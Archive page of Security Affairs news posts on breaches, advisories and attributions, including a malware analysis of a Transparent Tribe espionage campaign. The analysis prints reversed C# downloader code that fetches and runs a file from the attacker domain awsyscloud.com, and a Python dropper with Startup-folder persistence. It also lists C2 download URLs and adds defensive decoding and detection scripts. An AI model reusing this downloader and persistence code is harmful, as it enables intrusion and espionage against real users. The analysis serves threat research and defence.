Author Archives: Pierluigi Paganini

Google removed nearly 600 apps from the Play Store for ad policy violation

Google announced that it has removed nearly 600 Android apps from the official Play Store for violating two ad-related policies.

Google removed from the official Play Store nearly 600 Android apps that were violating two ad-related policies; it also banned the same apps from Google AdMob and Google Ad Manager.

“As part of our ongoing efforts — along with help from newly developed technologies — today we’re announcing nearly 600 apps have been removed from the Google Play Store and banned from our ad monetization platforms, Google AdMob and Google Ad Manager, for violating our disruptive ads policy and disallowed interstitial policy.” reads the Google announcement.

The apps violated the disruptive ads policy and the disallowed interstitial policy, which were established to prevent mobile ad fraud.

Google remarks that its policies don’t allow apps containing deceptive or disruptive ads. Ads must only be displayed within the app serving them and the tech giant considers ads served in any app as part of the app. This means that the ads shown in the developers’ apps must be compliant with all Google policies.

Below is how Google describes disruptive ads in its policy:

“Ads should not be shown in a way that results in inadvertent clicks. Forcing a user to click an ad or submit personal information for advertising purposes before they can fully use an app is prohibited.” reads the policy.

“Interstitial ads may only be displayed inside of the app serving them. If your app displays interstitial ads or other ads that interfere with normal use, they must be easily dismissable without penalty.”

Many users have noticed that some apps serve ads on a mobile device when the user is not active in their app, and clearly this behavior is not allowed by Google policies.

Google describes these ads as “out-of-context” because they can be displayed full screen at an inconvenient time, for example while the user is browsing in the mobile browser or doing a different task.

“This is an invasive maneuver that results in poor user experiences that often disrupt key device functions and this approach can lead to unintentional ad clicks that waste advertiser spend. For example, imagine being unexpectedly served a full-screen ad when you attempt to make a phone call, unlock your phone, or while using your favorite map app’s turn-by-turn navigation.” continues the announcement.

“Malicious developers continue to become more savvy in deploying and masking disruptive ads, but we’ve developed new technologies of our own to protect against this behavior”

Google revealed that it recently developed a machine-learning based approach to detect when apps show out-of-context ads, and used this technique to identify the malicious apps that have now been removed from the Play Store.

“As we move forward, we will continue to invest in new technologies to detect and prevent emerging threats that can generate invalid traffic, including disruptive ads, and to find more ways to adapt and evolve our platform and ecosystem policies to ensure that users and advertisers are protected from bad behavior.” concludes the post.

Pierluigi Paganini

(SecurityAffairs – Android, Play Store)

The post Google removed nearly 600 apps from the Play Store for ad policy violation appeared first on Security Affairs.

VMware addresses serious flaws in vRealize Operations for Horizon Adapter

VMware has addressed serious vulnerabilities in vRealize Operations for Horizon Adapter, including remote code execution and authentication bypass flaws.

VMware vRealize Operations is a software product that provides operations management across physical, virtual and cloud environments; it supports environments based on vSphere, Hyper-V or Amazon Web Services.

Horizon Adapter instances created on VMware vRealize Operations Manager nodes allow users to receive communications from Horizon agents installed on virtual machines.

The three vulnerabilities in vRealize Operations for Horizon Adapter (CVE-2020-3943, CVE-2020-3944, CVE-2020-3945) were reported by An Trinh, a cyber security expert from Vietnam’s telecommunications service provider Viettel.

Trinh did not share technical details about the vulnerabilities.

The most severe issue, tracked as CVE-2020-3943, is a remote code execution flaw rated as critical that can be exploited by an unauthenticated attacker with network access to vRealize Operations, with the Horizon Adapter running.

“vRealize Operations for Horizon Adapter contains multiple security vulnerabilities.” reads an advisory published by VMware.

“vRealize Operations for Horizon Adapter uses a JMX RMI service which is not securely configured. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.0.”

“An unauthenticated remote attacker who has network access to vRealize Operations, with the Horizon Adapter running, may be able to execute arbitrary code in vRealize Operations”

The second flaw, tracked as CVE-2020-3944 and rated high severity, could allow an unauthenticated attacker with access to the network to bypass Adapter authentication.

“vRealize Operations for Horizon Adapter has an improper trust store configuration leading to authentication bypass. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.6.” continues the advisory.

“An unauthenticated remote attacker who has network access to vRealize Operations, with the Horizon Adapter running, may be able to bypass Adapter authentication.”

The last flaw, tracked as CVE-2020-3945 and rated as moderate severity, is an information disclosure vulnerability caused by “incorrect pairing implementation between the vRealize Operations for Horizon Adapter and Horizon View.”

The flaws affect vRealize Operations for Horizon Adapter 6.6.x and 6.7.x on Windows. VMware released versions 6.6.1 and 6.7.1 to address the flaws.

Pierluigi Paganini

(SecurityAffairs – hacking, IOTA foundation)


Exclusive: Pakistan and India to armaments: Operation Transparent Tribe is back 4 years later

Exclusive: Pakistan and India to armaments. Researchers from Cybaze-Yoroi ZLab gathered intelligence on the return of Operation Transparent Tribe, 4 years later.

Introduction

Operation Transparent Tribe was first spotted by Proofpoint researchers in February 2016, in a series of espionage operations against Indian diplomats and military personnel in some embassies in Saudi Arabia and Kazakhstan. At that time, the researchers tracked the source IPs to Pakistan; the attacks were part of a wider operation relying on multiple vectors such as watering hole websites and phishing email campaigns delivering custom RATs dubbed Crimson and Peppy. These RATs are capable of exfiltrating information, taking screenshots and recording webcam streams.

This threat actor vanished for a long period and reappeared only last month, probably because of the current tensions between the two countries. We noticed that the TTPs of the group are almost the same, leveraging a weaponized document with a fake certificate of a request for an Indian public fund. So, the Cybaze-Yoroi ZLab team decided to dive deep into a technical analysis.

Technical Analysis

Hash: 662c3b181467a9d2f40a7b632a4b5fe5ddd201a528ba408badbf7b2375ee3553
Threat: New Operation Transparent Tribe Campaign
Brief Description: Malicious macro document of the new Campaign of Transparent Tribe
Ssdeep: 24576:Nh2axIaansJlyJ1prFnFmbX3ti6iEIb+R9mSXH9tBUnTqHT:Nhfx4nsPyJ1ppnEX3UCICRhXHXe

Table 1. Static information about the malicious macro 

The document presents itself as a request for a DSOP FUND (Defence Services Officers Provident Fund). It is a fund where an officer compulsorily deposits some money with the Government on a monthly basis out of his wages / salary.

The Fund is financial planning for defense personnel. The money is kept by the government and in return, a “non-permanent” profit officially titled as “interest” is given back to the officers at the end of each year. The DSOP fund scheme has been set up as a “welfare measure” to the depositors while the wages remain barely meeting ends otherwise.

Figure 1: Piece of the malicious document employed in the Op. Transparent Tribe

Self-Extracting Macro

Analyzing the content of the Excel file, we notice that the file contains all the necessary components to perform the infection:

Figure 2: Piece of the malicious macro

The macro is not heavily obfuscated. The macro components are hidden as Hex or Decimal strings, which will be combined with each other to unleash the next stage of the infection.

Then it is possible to deobfuscate them.

Figure 3: Extracted component from the macro
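As an added illustration (not code from the ZLab analysis), the following Python helper rebuilds a component from hex- and decimal-encoded chunks of the kind the macro concatenates, and identifies the result from its leading bytes. The chunk formats, the function names (`decode_chunk`, `rebuild`, `identify`) and the sample chunks are assumptions constructed for this example; the real macro’s variable layout is not shown on the page.

```python
"""Rebuild a macro-embedded component from hex/decimal string chunks.

Added example, not code from the Cybaze-Yoroi ZLab analysis. The macro keeps its
components as hex or decimal strings that are concatenated to produce the next
stage; this helper decodes such chunks, joins them and identifies the result
from its leading bytes. Chunk formats, names and sample data are assumptions
constructed for this example.
"""
import binascii
import re

# An even run of hex digits, e.g. "4D5A9000"
HEX_RE = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")
# Byte values separated by commas and/or whitespace, e.g. "77,90,144,0"
DEC_RE = re.compile(r"^\d{1,3}(?:[,\s]+\d{1,3})*$")


def decode_chunk(chunk, encoding="auto"):
    """Decode one chunk. encoding is "hex", "dec" or "auto".

    In "auto" mode hex is tried first, so a lone separator-free value such as
    "77" is read as hex (0x77), not decimal 77; pass the encoding explicitly
    when the macro's variable naming makes the format known.
    """
    s = chunk.strip()
    if encoding in ("auto", "hex") and HEX_RE.match(s):
        return binascii.unhexlify(s)
    if encoding in ("auto", "dec") and DEC_RE.match(s):
        values = [int(v) for v in re.split(r"[,\s]+", s)]
        if any(v > 255 for v in values):
            raise ValueError("decimal chunk holds a value above 255: %r" % s)
        return bytes(values)
    raise ValueError("chunk is not %s encoded: %r" % (encoding, s[:32]))


def rebuild(chunks, encoding="auto"):
    """Concatenate the decoded chunks in the order the macro combines them."""
    return b"".join(decode_chunk(c, encoding) for c in chunks)


def identify(blob):
    """Classify a reconstructed artifact by magic bytes or content."""
    if blob.startswith(b"MZ"):
        return "pe"
    if blob.startswith(b"PK\x03\x04"):
        return "zip"
    try:
        text = blob.decode("ascii")
    except UnicodeDecodeError:
        return "unknown"
    lowered = text.lower()
    if "createobject(" in lowered or "wscript." in lowered:
        return "vbs"
    if "using system" in lowered or "namespace " in lowered:
        return "csharp"
    return "text"


# Constructed sample: a PE header split across a hex chunk and a decimal chunk,
# a zip header as hex, and a VBS one-liner stored as decimal byte values.
SAMPLE_PE_CHUNKS = ["4D5A90000300", "0,0,4,0,0,0,255,255"]
SAMPLE_ZIP_CHUNK = "504B0304"
SAMPLE_VBS_CHUNK = ",".join(str(b) for b in b'Set o = CreateObject("WScript.Shell")')


def demo():
    """Decode the constructed samples and report what each one is."""
    return {
        "pe": identify(rebuild(SAMPLE_PE_CHUNKS)),
        "zip": identify(decode_chunk(SAMPLE_ZIP_CHUNK)),
        "vbs": identify(decode_chunk(SAMPLE_VBS_CHUNK, "dec")),
    }


if __name__ == "__main__":
    for name, kind in demo().items():
        print("%s -> %s" % (name, kind))
```

The identification step matters in practice: the macro in this campaign drops a VBS script, a C# source file and a zip archive containing PE files, so an analyst wants to know which of these a decoded string produced before deciding how to handle it.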

The macro creates two folders inside %PROGRAMDATA% path, “systemidleperf” and “SppExtComTel”. 

Figure 4: Extracted files

Analyzing these files, we find a VBS script, a C# source file and a zip file; inside this archive we found 4 PE artifacts:

Figure 5: Content of the “systemidleperf.zip” file

The SilentCMD Module

The two DLLs are legitimate Windows libraries used in support of the malicious behaviour. Instead, the “windproc.scr” and “windprocx.scr” files are compiled versions of the SilentCMD utility, publicly available on GitHub. SilentCMD executes a batch file without opening the command prompt window; if required, the console output can be redirected to a log file.

Figure 6: SilentCMD main routine

The SilentCMD utility is used to execute the commands pushed from the C2, all of them without showing anything to the user. However, it is curious to notice that the malware installs two different variants of the executable, the only difference being the timestamp:

Figure 7: Comparison between the two files

The Real Time Module

The other extracted file is “Realtime.cs”, the source of a small C# program that is compiled and run during the execution of the macro. The code is very simple and its only purpose is to download another component from the internet:

    using System;
    using System.Collections.Generic;
    using System.Diagnostics;
    using System.IO;
    using System.Net;
    using System.Text;

    namespace Realtime
    {
        class Program
        {
            static void Main(string[] args)
            {
                // Stage 1: fetch the next component from the drop URL into the staging folder
                WebClient wc = new WebClient();
                wc.DownloadFile("http://www.awsyscloud.com/x64i.scr", @"c:\\programdata\\systemidleperf\\x64i.scr");

                // Stage 2: run the program named in args[0] with "/c <args[1]>" in a hidden window
                Process proc = new Process();
                proc.StartInfo.FileName = Convert.ToString(args[0]);
                proc.StartInfo.Arguments = "/c " + Convert.ToString(args[1]);
                proc.StartInfo.UseShellExecute = false;
                proc.StartInfo.CreateNoWindow = false;
                proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                proc.Start();
                Environment.Exit(0);
                //Application.Exit();
                /* if (!proc.Start())
                {
                    //Console.WriteLine("Error starting");
                    return;
                }*/
                //proc.WaitForExit();
            }
        }
    }

Code snippet 1

The code is really simple: it downloads the file “x64i.scr” from the drop URL “awsyscloud[.]com” and saves it into the folder “c:\programdata\systemidleperf\”. The file is then immediately executed through the C# process primitives.

The X64i.scr File

Hash: 7b455b78698f03c0201b2617fe94c70eb89154568b80e0c9d2a871d648ed6665
Threat: New Operation Transparent Tribe Campaign
Brief Description: Python stub malware of the new Campaign of Transparent Tribe
Ssdeep: 196608:jXm2jfTjEzWt7+eW3TAPHULULN3erOAjsjAbpSzZTfuHO0y7:Lm2jfTgWt65U4UL9eCDHzZfyG7
Icon: (image not reproduced)

Table 2. Static information about the Python stub

The icon of the executable lets us understand that the malware was built with the PyInstaller tool, which creates a complete self-contained executable from Python source code. However, the two main disadvantages of this choice are the large footprint of the executable (more than 7.5 MB, which generates a lot of noise inside the system) and the ease with which the executable can be reversed to recover the source code.

So, after the operation of reversing, the extracted code of the malware is the following:

    from ctypes import *
    import socket, time, os, struct, sys
    from ctypes.wintypes import HANDLE, DWORD
    import platform
    import ctypes
    import _winreg
    import time
    import os
    import platform
    import binascii
    import _winreg
    import subprocess

    # Hex-encoded PE payloads (replaced with placeholders in this listing)
    bitstream3 = "PAYLOAD_ONE"
    bitstream4 = "PAYLOAD_TWO"

    oses = os.name
    systems = platform.system()
    releases = platform.release()
    architectures = platform.architecture()[0]

    def main():
        try:
            runsameagain()
        except Exception as e:
            print str(e)

    def runsameagain():
        # Drop the first payload into %PROGRAMDATA%\SppExtComTel, set persistence, run it
        global bitstream3
        binstr = bytearray(binascii.unhexlify(bitstream3))
        if not os.path.exists("c:\programdata\SppExtComTel"):
            os.makedirs("c:\programdata\SppExtComTel")
        WriteFile("c:\programdata\SppExtComTel\SppExtComTel.scr",binstr);
        bootup()
        subprocess.Popen(["c:\programdata\SppExtComTel\SppExtComTel.scr", '--brilliance'])

    def rundifferentagain():
        # Same as runsameagain(), but with the second payload
        global bitstream4
        binstr = bytearray(binascii.unhexlify(bitstream4))
        if not os.path.exists("c:\programdata\SppExtComTel"):
            os.makedirs("c:\programdata\SppExtComTel")
        WriteFile("c:\programdata\SppExtComTel\SppExtComTel.scr",binstr);
        bootup()
        subprocess.Popen(["c:\programdata\SppExtComTel\SppExtComTel.scr", '--brilliance'])

    def Streamers():
        try:
            rundifferentagain()
            return 1
        except Exception as e:
            print str(e)

    def WriteFile(filename,data):
        with open(filename,"wb") as output:
            output.write(data)

    def bootup():
        # Persistence: a .lnk in the user's Startup folder pointing at the dropped .scr
        try:
            from win32com.client import Dispatch
            from win32com.shell import shell,shellcon
            dpath = "c:\programdata\SppExtComTel"
            #print "before"
            Start_path = shell.SHGetFolderPath(0, shellcon.CSIDL_STARTUP, 0, 0)
            com_path = os.path.join(Start_path, "SppExtComTel.lnk")
            target = os.path.join(dpath,"SppExtComTel.scr")
            wDir = dpath
            icon = os.path.join(dpath, "SppExtComTel.scr")
            shell = Dispatch('WScript.Shell')
            shortcut = shell.CreateShortCut(com_path)
            shortcut.Targetpath = target
            shortcut.WorkingDirectory = wDir
            shortcut.IconLocation = icon
            shortcut.save()
            #print "there"
            #return True
        except Exception, e:
            print str(e)

    if __name__ == "__main__":
        try:
            #print oses
            #print systems
            #print releases
            #print architectures
            # Payload selection by Windows version
            if '.py' not in sys.argv[0]:
                #sys.exit()
                #print "nothign to do"
                if systems == 'Windows' and releases == "7":
                    main()
                elif systems == 'Windows' and (releases == "8.1" or releases == "8"):
                    Streamers()
                elif systems == 'Windows' and releases == "10":
                    #print "Please use a 64 bit version of python"
                    #print "entering streamers"
                    Streamers()
                else:
                    Streamers()
        except Exception as e:
            print str(e)

Code snippet 2 

The Python code is very simple to analyze and explain. The first operation is to declare two global variables, “bitstream3” and “bitstream4”: they are the hexadecimal representations of two PE files, which will be examined in the next sections. Which of the two files is used depends on the Windows OS version, as visible at the bottom of the code.

After that, the script writes the chosen payload into the folder “c:\programdata\SppExtComTel\” and immediately executes it with the parameter “--brilliance”. The malware then guarantees its persistence through the creation of a LNK file inside the Startup folder.

Figure 8: Persistence mechanism
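The dropper chain described for Realtime.cs and for the Python stub (staging folders under %PROGRAMDATA%, .scr executables launched from there, the “--brilliance” argument, a LNK written to the Startup folder) can be turned into detection logic. The script below is an added example and not part of the ZLab analysis: it runs a few rules over constructed, simplified process-creation and file-creation event lines in a key=value layout (not real Sysmon or EDR output). The event layout, the field names, the rule set and the sample lines are assumptions made here.

```python
"""Detection logic for the dropper chain described in the analysis.

Added example, not code from the Cybaze-Yoroi ZLab analysis. It applies rules
derived from the post's indicators (staging folders under %PROGRAMDATA%, .scr
executables run from there, the --brilliance argument, a .lnk written to the
Startup folder) to constructed, simplified process-creation and file-creation
events in a key=value layout. The event layout, field names and sample lines
are assumptions made for this example, not real Sysmon/EDR output.
"""
import re

# Staging folders named in the analysis (compared case-insensitively)
STAGING_DIRS = ("\\programdata\\systemidleperf\\", "\\programdata\\sppextcomtel\\")
# Argument the Python stub passes to the dropped .scr
DROPPER_ARG = "--brilliance"
# Office hosts whose macros should not be spawning binaries from ProgramData
OFFICE_HOSTS = ("\\excel.exe", "\\winword.exe", "\\powerpnt.exe")
STARTUP_LNK_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Parse one 'key=value key="quoted value"' line into a dict."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def in_staging_dir(path):
    return any(d in path.lower() for d in STAGING_DIRS)


def check_event(ev):
    """Return the list of rule hits for one parsed event."""
    hits = []
    image = ev.get("image", "")
    if ev.get("type") == "process_create":
        cmdline = ev.get("cmdline", "")
        parent = ev.get("parent", "")
        if in_staging_dir(image) and image.lower().endswith(".scr"):
            hits.append("scr executed from staging folder: " + image)
        if DROPPER_ARG in cmdline.split():
            hits.append("dropper argument %s in command line" % DROPPER_ARG)
        if parent.lower().endswith(OFFICE_HOSTS) and "\\programdata\\" in image.lower():
            hits.append("Office host spawned a binary from ProgramData: " + image)
    elif ev.get("type") == "file_create":
        target = ev.get("target", "")
        if STARTUP_LNK_RE.search(target) and in_staging_dir(image):
            hits.append("Startup shortcut written by staged binary: " + target)
    return hits


def scan(lines):
    """Run every rule over every line; returns (line_index, message) pairs."""
    alerts = []
    for idx, line in enumerate(lines):
        for msg in check_event(parse_event(line)):
            alerts.append((idx, msg))
    return alerts


# Constructed sample events mirroring the chain in the analysis
SAMPLE_EVENTS = [
    'type=process_create image="C:\\Windows\\System32\\svchost.exe" '
    'cmdline="svchost.exe -k netsvcs" parent="C:\\Windows\\System32\\services.exe"',
    'type=process_create image="C:\\ProgramData\\systemidleperf\\windproc.scr" '
    'cmdline="windproc.scr run.bat" parent="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"',
    'type=process_create image="C:\\ProgramData\\systemidleperf\\x64i.scr" '
    'cmdline="x64i.scr" parent="C:\\Windows\\System32\\cmd.exe"',
    'type=process_create image="C:\\ProgramData\\SppExtComTel\\SppExtComTel.scr" '
    'cmdline="SppExtComTel.scr --brilliance" parent="C:\\ProgramData\\systemidleperf\\x64i.scr"',
    'type=file_create image="C:\\ProgramData\\systemidleperf\\x64i.scr" '
    'target="C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\SppExtComTel.lnk"',
    'type=file_create image="C:\\Program Files\\App\\setup.exe" '
    'target="C:\\Users\\alice\\Desktop\\App.lnk"',
]

if __name__ == "__main__":
    for idx, msg in scan(SAMPLE_EVENTS):
        print("event %d: %s" % (idx, msg))
```

The folder names and the argument are campaign-specific and easy for the operators to change; the structural rules (an Office host launching a binary from ProgramData, and a Startup shortcut written by a process that itself lives in ProgramData) are the ones worth keeping in a detection set beyond this sample.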

The RAT

Figure 9: Static information about the Rat

As previously stated, the malware payload is the core component of the malware implant. 

As shown in the above figure, the malware is written for the .NET framework and its creation date goes back to 29 Jan 2020. It is the date of the beginning of the malware campaign, as also demonstrated by the registration records of the C2. The malware is a modular implant that downloads other components from the C2.

The first operation is to provide to the C2 a list of the running processes on the victim machine: 

Figure 10: C2 communication

The method used to send the information to the C2 is the following: 

Figure 11: C2 communication routine

After that, the malware loops in a cycle and waits for some commands coming from the C2:

Figure 12: Routine for the download of new modules

When the C2 sends commands to instruct the bot, the malware downloads and executes two other components, two DLLs downloaded from the following URLs:

  • http[:]//awsyscloud[.]com/E@t!aBbU0le8hiInks/B/3500/m1ssh0upUuchCukXanevPozlu.dll
  • http[:]//awsyscloud[.]com/E@t!aBbU0le8hiInks/D/3500/p2ehtHero0paSth3end.dll

The first DLL, once executed, is renamed “indexerdervice.dll”. This executable has a sophisticated encryption method for its communication with the C2:

Figure 13: Evidence of the decrypting routine of the certificate

The above screen shows that the malware requests an RSA key, which has to be validated against the highlighted text. If the check passes, the malware proceeds to its malicious actions, such as sending information:

Figure 14: Sending routine of the malware

The second malware module is a simple DLL whose purpose is to download other components from the drop URL and then install them:

Figure 15: Evidence of the hard-coded AES key

The downloaded code has been encrypted through the Rijndael algorithm with a hard-coded key.

Conclusion

Transparent Tribe is back with a new campaign after several years of (apparent) inactivity. We can confirm that this campaign is completely new, relying on the registration record of the C2 that dates back to 29 January 2020. The decoy document presents itself as a request for a DSOP FUND (Defence Services Officers Provident Fund), a provident fund for officials and military personnel, confirming the espionage and counterintelligence character of this campaign.

Finally, we have no certainty that this campaign has been inactive for 4 years; it may be that it acted quietly, but now the cyber criminal group is back in view of today’s tensions between the two countries.

Additional technical details, including Indicators of Compromise and Yara Rules, are reported in the analysis published by ZLab available here:

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Transparent Tribe)


DOD DISA US agency discloses a security breach

The Defense Information Systems Agency (DISA) US agency in charge of secure IT and communication for the White House has disclosed a data breach.

The Defense Information Systems Agency (DISA), the DoD agency that is in charge of the security of IT and telecommunications for the White House and military troops has suffered a cyber attack.

The agency sent a data breach notification to its employees last week informing them of a security breach that took place last year between May and July.

Hackers accessed employees’ personal details, including social security numbers. DISA is investigating the incident with federal authorities and is now offering free credit monitoring to all impacted individuals.

At this time it is not clear how many DISA employees have been impacted; the agency did not share any details on the incident, for obvious reasons.

This kind of attack could have severe consequences for homeland security: attackers could use the stolen data to carry out targeted attacks in the future with the intent of breaching DoD networks.

This isn’t the first time the DoD has suffered a data breach: in October 2018 the Defense Department’s travel records were hacked and attackers compromised the personal information and credit card data of U.S. military and civilian personnel.

The data breach could have happened some months before and could have affected as many as 30,000 military and civilian personnel.

Pierluigi Paganini

(SecurityAffairs – hacking, US DISA)


Dragos Report: Analysis of ICS flaws disclosed in 2019

More than 400 flaws affecting industrial control systems (ICS) were disclosed in 2019, more than 100 were zero-day vulnerabilities.

According to a report published by Dragos, the experts analyzed 438 ICS vulnerabilities that were reported in 212 security advisories; 26% of the advisories are related to zero-day flaws.

The experts determined 116 unique types of flaws, the most common were improper input validation, stack-based buffer overflow, cross-site scripting (XSS), the use of hardcoded credentials, and uncontrolled resource consumption (i.e. DoS) issues.


The experts revealed that 77% of the assessed vulnerabilities reside deep within a control system network: the flaws only affect products that belong on engineering workstations, human-machine interface (HMI) systems, operator panels, industrial network equipment, and the field devices themselves. The researchers pointed out that exploiting them requires some existing access to a control systems network.

Only 9% of advisories were related to flaws in products associated with border systems (i.e. data historians, OPC servers, cross-domain web applications, and VPN services); their exploitation could potentially allow attackers to move from the IT to the OT network.

Most of the advisories (roughly 75%) are related to vulnerabilities that could be exploited from the network, while the remaining flaws could be only exploited by attackers with local or physical access to the targeted machine.

The report analyzed the operational impact on industrial control processes for each issue. The threats against industrial processes result in three impact categories, the loss of view, the loss of control, or both.

“50% of advisories could cause both a loss of view and a loss of control.” reads the report published by Dragos. “5% of advisories could only cause a loss of view (but no loss of control) via exploitation.” “2% of advisories could result in a loss of control (but no loss of view).”

43% of advisories covered flaws that could cause neither loss of view nor loss of control.

On mitigation advice, the report states that 26% of advisories had no patch available when the initial advisory was disclosed, and 76% of the advisories without a patch offered no mitigation advice either, exposing users to the risk of exploitation.

55% of advisories had a patch, but no alternate mitigation.

Additional details are included in the report published by Dragos.

Pierluigi Paganini

(SecurityAffairs – ICS, hacking)


Croatia’s largest petrol station chain INA group hit by ransomware attack

Some operations at INA Group, Croatia’s biggest oil company, and its largest petrol station chain were disrupted by a cyber attack.

A ransomware attack has disrupted operations at INA Group, Croatia’s biggest oil company, and its largest petrol station chain.

INA, d.d. is a stock company with the Hungarian MOL Group and the Croatian Government as its biggest shareholders, while a minority of shares is owned by private and institutional investors.

The company was not able to issue invoices or accept loyalty cards as a result of the attack, which took place last Friday, February 14, at 22:00 local time.

“The INA Group is under cyber-attack, which began around 10 pm on February 14, 2020, causing problems in the operation of certain IT systems, which can occasionally affect normal operation, such as issuing mobile phone vouchers, electronic vignettes, paying utility bills.” reads a security breach notice published by the company on its website. “Market supply is secure. Fuel sales at our retail locations continue unhindered. All payments are secure, whether it is a cash payment, an INA card or a bank card. INA is taking steps to remedy the system’s hassle.”

After the security breach, the company was still able to provide petrol fuel to its customers and to handle payments.

“Multiple sources have told ZDNet the cyber-attack is a ransomware infection that infected and then encrypted some of the company’s backend servers.” states ZDNet that first reported the issue.

“It did, however, impact its ability to issue invoices, register loyalty card use, issue new mobile vouchers, issue new electronic vignettes, and allow customers to pay gas utility bills (INA is also a natural gas provider in Croatia).”

The company announced it was working to restore all systems.

ZDNet, citing a source familiar with the incident, speculates that the CLOP ransomware was used in the attack.

This ransomware family was also spotted by researcher Vitali Kremez in December 2019. The malware targets Windows systems and attempts to disable security products running on the infected systems.

The malicious code executes a small program, just before starting the encryption process, to disable security tools running on the infected systems that could detect its operations.

The Clop ransomware also attempts to disable Windows Defender by configuring the registry values associated with this defense feature.

Pierluigi Paganini

(SecurityAffairs – INA Group, ransomware)


UK, US and its allies blame Russia’s GRU for 2019 cyber-attacks on Georgia

The British and US governments blame Russia for a destructive cyber attack that hit Georgia during 2019.

The governments of Britain and the US declared that Russia’s military intelligence service GRU is behind the massive cyber attack that hit Georgia during 2019.

In October 2019, a wave of cyber attacks hit 2,000 websites in Georgia, including the sites of the president, courts, and local media.

“The UK, Georgia and international partners have exposed the GRU’s – Russia’s military intelligence service – responsibility for a number of significant cyber-attacks against Georgia last year.” reads a press release published by the Foreign & Commonwealth Office, the National Cyber Security Centre, and The Rt Hon Dominic Raab MP.

“The National Cyber Security Centre (NCSC) assesses with the highest level of probability that on 28 October 2019 the GRU carried out large-scale, disruptive cyber-attacks. These were against a range of Georgian web hosting providers and resulted in websites being defaced, including sites belonging to the Georgian Government, courts, non-government organisations (NGOs), media and businesses, and also interrupted the service of several national broadcasters.”


According to the statement, the cyber-attacks are part of Russia’s long-running campaign of destabilising activity against Georgia.

The government officials attribute the attack to the nation-state actor tracked as Sandworm, BlackEnergy, Telebots, and VoodooBear.

The group operated under the control of the GRU’s Main Centre of Special Technologies (aka ‘GTsST’ or field post number 74455).

That field post number, 74455, is the same as the one for the APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM).

The APT28 group has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 Presidential election.

According to a report published by Symantec in October 2018, the group was actively conducting cyber espionage campaigns against government and military organizations in Europe and South America.

Starting in 2017 and continuing into 2018, the APT28 group returned to covert intelligence gathering operations in Europe and South America.

The UK intelligence confirmed that the attacks also caused the interruption of the transmissions of Georgian TV stations.

“The GRU’s reckless and brazen campaign of cyber-attacks against Georgia, a sovereign and independent nation, is totally unacceptable. The Russian government has a clear choice: continue this aggressive pattern of behaviour against other countries, or become a responsible partner which respects international law.” said the Foreign Secretary Dominic Raab.

“The UK will continue to expose those who conduct reckless cyber-attacks and work with our allies to counter the GRU’s menacing behaviour.”

The GRU unit involved in the attack was also considered responsible for the following cyber attacks:

  • BlackEnergy: December 2015 shut off part of Ukraine’s electricity grid, with 230,000 people losing power for between 1 to 6 hours
  • Industroyer: December 2016 shut off part of Ukraine’s electricity grid, also known as CrashOverride. It resulted in a fifth of Kyiv losing power for an hour. It is the first known malware designed specifically to disrupt electricity grids
  • NotPetya: June 2017 destructive cyber-attack targeting the Ukrainian financial, energy and government sectors and affecting other European and Russian businesses
  • BadRabbit: October 2017 ransomware encrypted hard drives and rendered IT inoperable. This caused disruption including to the Kyiv metro, Odessa airport, Russia’s central bank and 2 Russian media outlets

The UK Government considers Georgia a strategic partner and supports several projects in the country.

“This action contradicts Russia’s attempts to claim it is a responsible actor in cyberspace and demonstrates a continuing pattern of reckless Russian GRU cyber operations against a number of countries. These operations aim to sow division, create insecurity, and undermine democratic institutions.” foreign secretary Michael Pompeo said.

Pierluigi Paganini

(SecurityAffairs – GRU, APT28)


Adobe released out-of-band updates for After Effects and Media Encoder apps

Adobe released out-of-band security updates for After Effects and Media Encoder applications that address two new critical vulnerabilities.

Adobe released out-of-band security updates for After Effects and Media Encoder applications that fix two new critical vulnerabilities (CVE-2020-3765, CVE-2020-3764).

Adobe After Effects is a digital visual effects, motion graphics, and compositing application used in the post-production process of film making, video games and television production. Adobe Media Encoder is a transcoding and compression app.

The two issues are classified as out-of-bounds write memory corruption flaws; an attacker could exploit them to execute arbitrary code on targeted systems by tricking victims into opening a specially crafted file with the vulnerable software.

The CVE-2020-3765 vulnerability in Adobe After Effects was discovered by security researcher Matt Powell and reported to Adobe via the Trend Micro Zero Day Initiative.

“Adobe has released an update for Adobe After Effects for Windows. This update resolves a critical out-of-bounds write vulnerability that could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

The CVE-2020-3764 flaw in Adobe Media Encoder was reported to Adobe by Canadian security researcher Francis Provencher.

“Adobe has released an update for Adobe Media Encoder. This update resolves a critical out-of-bounds write vulnerability that could lead to arbitrary code execution in the context of the current user.” reads the advisory published by Adobe.

The good news is that Adobe is not aware of any in-the-wild attacks exploiting either of the two flaws.

Earlier this month, Adobe released February 2020 Patch Tuesday updates that address a total of 42 vulnerabilities in Framemaker, Acrobat and Reader, Flash Player, Digital Editions and Experience Manager products.

Most of the vulnerabilities (21) affect the Windows version of the Framemaker document processor. The most severe issues are classified as critical buffer overflow, heap overflow, out-of-bounds write, and memory corruption flaws, all of which can lead to arbitrary code execution in the context of the current user.

Pierluigi Paganini

(SecurityAffairs – hacking, Adobe)

The post Adobe released out-of-band updates for After Effects and Media Encoder apps appeared first on Security Affairs.

Cisco fixes a static default credential issue in Smart Software Manager tool

Cisco has released security updates to address 17 vulnerabilities affecting its networking and unified communications product lines.

Cisco has released security patches to fix 17 vulnerabilities affecting its networking and unified communications product lines.

The types of fixed vulnerabilities include remote access and code execution, elevation of privilege, denial of service, and cross-site request forgeries.

One of the flaws patched by the IT giant, tracked as CVE-2020-3158, is rated critical, while six vulnerabilities are rated high severity.

The CVE-2020-3158 flaw stems from a system account with a default, static password in the Smart Software Manager On-Prem tool.

